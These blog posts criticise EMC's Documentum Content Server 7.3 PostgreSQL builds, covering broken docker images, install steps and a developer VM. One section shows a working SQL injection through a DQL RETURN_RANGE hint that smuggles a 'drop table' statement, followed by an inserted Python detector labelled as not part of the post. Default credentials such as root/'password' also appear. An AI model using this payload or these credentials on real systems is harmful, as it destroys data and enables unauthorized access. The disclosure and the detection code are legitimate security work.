100000 hours of engineering work

This blog post looks foolish because it does not contain any useful information; however, I was unable to miss the gem described below.

We all know that a talented team has wasted more than 100000 hours of engineering work to create the PostgreSQL build, and finally it seems they have found a first customer who decided to install this marvel: DATEDIFF return wrong value in Content Server 7.3 + PostgreSQL 🙂

Poor documentation or backdoor?

Four months ago I disclosed a vulnerability in Documentum 7.3/PostgreSQL which allows an attacker to execute arbitrary SQL statements. The interesting thing here is that the vulnerability description is a bit wrong, i.e. the prerequisite “return_top_results_row_based config option is set to false” is not required:

Connected to Documentum Server running Release 7.3.0010.0013  Linux64.Postgres
Session id is s0
API> ?,c,select count(*) from dm_user ENABLE (RETURN_RANGE 1 10 '1;drop table dm_user_s;')
     [DM_QUERY_E_INVALID_POSITION]error:  
       "The ORDER BY position number 1;drop table dm_user_s;  
       is out of range of the number of items in the select list."


API> ?,c,select count(*) from dm_user ENABLE (OBJECT_BASED,RETURN_RANGE 1 10 '1;drop table dm_user_s;')
     [DM_QUERY_E_CURSOR_ERROR]error:  
       "A database error has occurred during the creation of a cursor 
       (' STATE=2BP01, CODE=7, MSG=ERROR: cannot drop table dm_user_s 
       because other objects depend on it; Error while executing the query')."

What is the OBJECT_BASED hint?
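
A defensive check for the issue shown above, as an added example that is not part of the original post: it scans DQL statements (for instance from a query trace or audit log) and flags RETURN_RANGE hints whose sort clause is anything other than a comma-separated list of column names or select-list positions. The hint grammar and the two benign statements are assumptions; the two flagged statements are the ones from the session above.

```python
import re

# Assumed hint shape, based on the statements shown in the post:
#   RETURN_RANGE <start> <end> [<optimize_top_row>] '<sort clause>'
HINT_RE = re.compile(
    r"RETURN_RANGE\s+\d+\s+\d+(?:\s+\d+)?\s+'((?:[^']|'')*)'",
    re.IGNORECASE,
)
# One sort term: a column name (optionally qualified) or a select-list
# position, followed by an optional direction. Nothing else is accepted.
TERM_RE = re.compile(
    r"^(?:[A-Za-z_][A-Za-z0-9_]*(?:\.[A-Za-z_][A-Za-z0-9_]*)?|\d+)"
    r"(?:\s+(?:ASC|DESC))?$",
    re.IGNORECASE,
)


def suspicious_sort_clauses(dql):
    """Return the RETURN_RANGE sort clauses in `dql` that are not a plain
    comma-separated list of columns or positions."""
    bad = []
    for match in HINT_RE.finditer(dql):
        clause = match.group(1)
        terms = [term.strip() for term in clause.split(",")]
        if not all(TERM_RE.match(term) for term in terms):
            bad.append(clause)
    return bad


def scan(statements):
    """Yield (statement_number, clause) for every clause worth reviewing."""
    for number, statement in enumerate(statements, start=1):
        for clause in suspicious_sort_clauses(statement):
            yield number, clause


# Constructed sample: statements 1 and 3 are benign (assumed column names),
# statements 2 and 4 are the two queries from the session in the post.
SAMPLE = [
    "select r_object_id from dm_document ENABLE (RETURN_RANGE 1 10 'object_name ASC')",
    "select count(*) from dm_user ENABLE (RETURN_RANGE 1 10 '1;drop table dm_user_s;')",
    "select r_object_id, object_name from dm_document ENABLE (RETURN_RANGE 11 20 '2 DESC, r_object_id')",
    "select count(*) from dm_user ENABLE (OBJECT_BASED,RETURN_RANGE 1 10 '1;drop table dm_user_s;')",
]

if __name__ == "__main__":
    for number, clause in scan(SAMPLE):
        print(f"statement {number}: review sort clause {clause!r}")
```

The same allow-list can be applied before a statement is passed to the server, rejecting the query instead of reporting it.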

EMC have shared CS 7.3

I have no idea what the IA acronym means (internet access, internal affairs?), however:

  • AIX/Oracle got resurrected – seems that money triumphs over evilstupidity
  • JMS is now on wildfly 9.0.1
  • bundled JVM version is 1.8.0_66
  • Linux/PostgreSQL is corrupted – try _old directory
  • composer.jar from Linux/Oracle is corrupted, borrow it from Linux/PostgreSQL
  • docker images seem to be corrupted too:
    docker load < centpgrccs 
    6941bfcbbfca: Loading layer [==================================================>] 1.024 kB/1.024 kB
    41459f052977: Loading layer [==================================================>] 224.7 MB/224.7 MB
    open /var/lib/docker/tmp/docker-import-813028725/dd1a6e7bc38e7d74bc5bb7be41e1d1d4f8d17d04cacef4cf93e3cc1ed16ce39e/json: no such file or directory
    
    
    [root@rhel72docker01 ~]# docker load < centpgseamlesscs 
    open /var/lib/docker/tmp/docker-import-785439904/be8abba669364a4895c80b2e4c06d8b391faffc54a190abc6aa91ed13d423140/json: no such file or directory
    
  • UPD

    By tradition I forgot to read the installation guide before performing the installation (actually it would be just a waste of time). In order to install Linux/PostgreSQL you need the following:

    • PostgreSQL database
    • /etc/odbcinst.ini
    • /etc/odbc.ini
    • connection_string environment variable pointing to ODBC’s name
    • POSTGRESQL_HOME environment variable pointing to installation directory of PostgreSQL client libraries (for example, if psql is located in /usr/bin/psql POSTGRESQL_HOME should be /usr)
    • remove $DM_HOME/bin/liblber-2.4.so.2

    UPD2

    The CS distribution media contains a special Java utility (MigrationUtil, sources are available) which allows changing the hostname, installation owner and even the docbase identifier and name of an already installed repository; it seems that EMC is seriously considering the idea of distributing CS as a ready-to-run docker image.

    UPD3

    MigrationUtil mentioned previously has turned out to be a piece of dog crap – you may use it only if you want to corrupt your database.

    UPD4

    I have no idea how it is possible to do docker without understanding its basic concepts – docker images are tar archives, not zip:

    Developer “PostgreSQL” edition fun

    18 months ago EMC released an extremely buggy version of Documentum Content Server intended for development purposes; some ECN members perfectly described the situation with it:

    and EMC’s reaction to such criticism was extremely eloquent (I do believe that nobody likes criticism, but ignoring real problems perfectly describes your respect for the customers):

    Three weeks ago a new version of Developer Edition appeared on EMC’s ftp server:

    What we should expect from new version?

    • Networking issues are still not resolved (it is weird because I already mentioned a good recipe for that – it must also be accompanied by the following shell script:
      cd /etc/udev/rules.d
      rm -f 70-persistent-net.rules
      rm -f 75-persistent-net-generator.rules
      echo "# " > 75-persistent-net-generator.rules

      ):

    • EMC decided to use weird lockbox feature, quote from readme file:

      4. Run dm_crypto_create and dm_crypto_boot utilities to enable Lockbox.
      ———————————————————————-
      4.1 Execute dm_crypto_create utility as below:
      dm_crypto_create -lockbox lockbox.lb -lockboxpassphrase Password@123 -keyname
      aek.key -passphrase Password@123 -check

      4.2 Run dm_crypto_boot utility as below:
      dm_crypto_boot -all
      Provide the key store passphrase as “Password@123” when prompted.

      , i.e. now you will need to run

      dm_crypto_boot -all -lockbox lockbox.lb \
       -lockboxpassphrase Password@123 -passphrase Password@123

      upon every reboot

    • xPlore still does not work:
    • there is still no reliable installer
    • and the real gem is that EMC disclosed their regression tests (check the /opt/Suites directory) – now you can make real progress on the developer edition 🙂

    PostgreSQL DEV image available

    ftp://ftp2.lss.emc.com/Hotfixes/postgress/Image-Postgres/ (credentials can be found in CS6.7SP1/7.0 patch notes; Google is also your friend).

    This VM image has a Postgres Database, Documentum Content Server, Postgres based pre-configured repository (MyRepo),
    DA and REStful services deployed on apache-tomcat server.
    
    Steps to use the VM player for running the VM image
    =======================================================
    
    1. Extract the CentOSPostgres18Feb.rar file using WinRAR.
    
    This rar file contains:
    -CentOSPostgres20Feb14.mf
    -CentOSPostgres20Feb14.ovf
    -CentOSPostgres20Feb14-disk1.vmdk
    -ReadMe.txt
    -Documentum Reference Guides: Reference guides related to Documentum
    
    2. Download and install the VMware player 6.0.1 or any other VM Player which supports ovf format. 
    
    3. Once the VMware player is running , launch the VM by selecting the *.ovf file.
    
    4. If the host CPU is Intel 64 bit ,you may encounter an error regarding Intel VT-x being disabled on the machine;
       reboot the machine and goto BIOS setting-> under CPU settings, enable Intel Virtualization preference.
    
    5. Once the VM Image is up and running login with dmadmin/password credential.
    
    6. Once you login in to the VM, refer readme in $HOME directory.
    
    7. root user password for VM image is password.

    UPDATE

    The download address has been changed; the new address is ftp://ftp2.lss.emc.com/dev_out/Image-Postgres/